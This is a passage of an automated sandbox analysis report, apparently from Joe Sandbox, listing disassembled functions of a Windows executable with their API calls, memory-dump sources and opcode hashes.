                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                                                        • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                        • Instruction ID: 2730b5ebdb9fbe5e7daddfc6da4ece19d1ef3920b26cc068115eb6ed4f65b4ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                                                                                                        • Instruction Fuzzy Hash: D4A12163B28292C1EE249F6594143B96290AF44BE4F544330EE6EC77C4EE3EE64BC705
                                                                                                                                                                        Function 00007FF6E9426BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • _pipe.MSVCRT ref: 00007FF6E9426C1E
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9426CD1
                                                                                                                                                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF6E9426CFB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 624391571-0
                                                                                                                                                                        • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                        • Instruction ID: d18856b5c33bc889b69867f617265c2e98839683751579b1101ef0a53d14e419
                                                                                                                                                                        • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                                                                        • Instruction Fuzzy Hash: 9071AF73A18602C6E714AF25D84023D76A2FF89754F188234DA1DD73D6DF3EA44ACB0A
                                                                                                                                                                        Function 00007FF6E94463FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4268342597-0
                                                                                                                                                                        • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                        • Instruction ID: d330ed25f77f10026c1d252b497b5638fc7c6951796b9c0a60d9d412ee496411
                                                                                                                                                                        • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 19813823A08786C1EB658F25A84037977A0FF58B84F184139CD4D87794DE3EE48ACB4A
                                                                                                                                                                        Function 00007FF6E94388C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenToken$CloseProcessThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2991381754-0
                                                                                                                                                                        • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                        • Instruction ID: 6c68decd7baeea48553c2f99d3656dbcce637323dc243489c542d11e61c6dccb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                                                                        • Instruction Fuzzy Hash: BA214833A08682CBE7409EA4D4443BDB7A0EF857A0F504135EB5982794EF7AE94DCB06
                                                                                                                                                                        Function 00007FF6E942586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E944C59E), ref: 00007FF6E9425879
                                                                                                                                                                          • Part of subcall function 00007FF6E94258D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425903
                                                                                                                                                                          • Part of subcall function 00007FF6E94258D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425943
                                                                                                                                                                          • Part of subcall function 00007FF6E94258D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9425956
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                        • String ID: %d.%d.%05d.%d
                                                                                                                                                                        • API String ID: 2996790148-3457777122
                                                                                                                                                                        • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                        • Instruction ID: 10c28bf49fc51fc743581df22876ebf185a41aafe20718ea08dead2df80e516b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                                                                        • Instruction Fuzzy Hash: D6F0A062A08385C7D3109F66B44016AAAA1FF88780F908138EA4A47B5ADF3DD528CB44
                                                                                                                                                                        Function 00007FF6E9437854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorFileFindFirstLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2831795651-0
                                                                                                                                                                        • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                                                                        • Instruction ID: 5fc0388f38eb5a329f48137dffe49feb4ecdf3785aa110f541ab42ae1becdb79
                                                                                                                                                                        • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                                                                        • Instruction Fuzzy Hash: EBD18C73A18682C6E760DF31A4583AA73A0FF44B98F105135DA8E87798DE3EE589C705
                                                                                                                                                                        Function 00007FF6E9427D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E9427DA1
                                                                                                                                                                          • Part of subcall function 00007FF6E943417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E94341AD
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9427EB7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 168394030-0
                                                                                                                                                                        • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                                                                        • Instruction ID: 4e58c7373514c0a927ef822ad59f3f0c668330b0cce2cac7df8a3a49f4f54ff9
                                                                                                                                                                        • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                                                                        • Instruction Fuzzy Hash: 84A1B223B08642D5FB64CF3698543B922A1FF85B88F404135DA1EC7AE5DF3EA549C70A
                                                                                                                                                                        Function 00007FF6E94389E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                        • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                        • Instruction ID: ef71823684e06dfd3dbdaaed5c83465224169aca63dd4712b85b85de7c76706e
                                                                                                                                                                        • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 74114873A28781CBEB109F21E4043A9BBA4FB84795F508131DA4842B94DF7EE588CB05
                                                                                                                                                                        Function 00007FF6E9438114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2149833895-0
                                                                                                                                                                        • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                        • Instruction ID: e359aff60ae3cec55130d36a629debeaa5be96e8678d04026853d19c5f3ecbb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A112132608782C6EB608F61F4447AEB7A0FF44B48F445535DA9D82A54DFBDD84CCB05
                                                                                                                                                                        Function 00007FF6E9448654 Relevance: 3.0, APIs: 2, Instructions: 39timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E9444227), ref: 00007FF6E9448678
                                                                                                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF6E9444227), ref: 00007FF6E94486D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2838179519-0
                                                                                                                                                                        • Opcode ID: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                        • Instruction ID: 3ac0bf8ecc29be41780c35977a8ebdec82a587fb997796a359f719ad4b7fd324
                                                                                                                                                                        • Opcode Fuzzy Hash: 62ebdb23c5db016c2826862ffbff753f6fa70ff692e943220732cd29ca21f8c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 07113C57528681C6DB248F65E00027AB370FFACB49B149122FE8DC7764EB3DC946CB1A
                                                                                                                                                                        Function 00007FF6E9428510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF6E94285D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3520273530-0
                                                                                                                                                                        • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                        • Instruction ID: 046c621fdc9dd12206b454c5c7356857bc1a94c073003c19a5450df0611d015b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                                                                        • Instruction Fuzzy Hash: B161AE23A08206C6F7689E75A5183BD36A0FF08754F408136DA1ED73D5DE3EA498C71A
                                                                                                                                                                        Function 00007FF6E943898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                        • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                        • Instruction ID: a31ecb8dd5cd81ad8a52aee7404e94eb34b89ce93cf58ce3ccafaf36cf5459b1
                                                                                                                                                                        • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FF030B3714B81CBD7008F64E5884DCB778FB44B84B95853ACB2843704DB76D9A8CB44
                                                                                                                                                                        Function 00007FF6E94393B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94393BB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                        • Instruction ID: 88b340470d2f3eed73ebe17883b36e79abf2d3a09656ec6f76cdf378f2102f70
                                                                                                                                                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                        • Instruction Fuzzy Hash: A3B01291F25402D1D708EF71DC851A012A07F5C710FC01471C00EC0160DE2ED1DFC705
                                                                                                                                                                        Function 00007FF6E942F8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
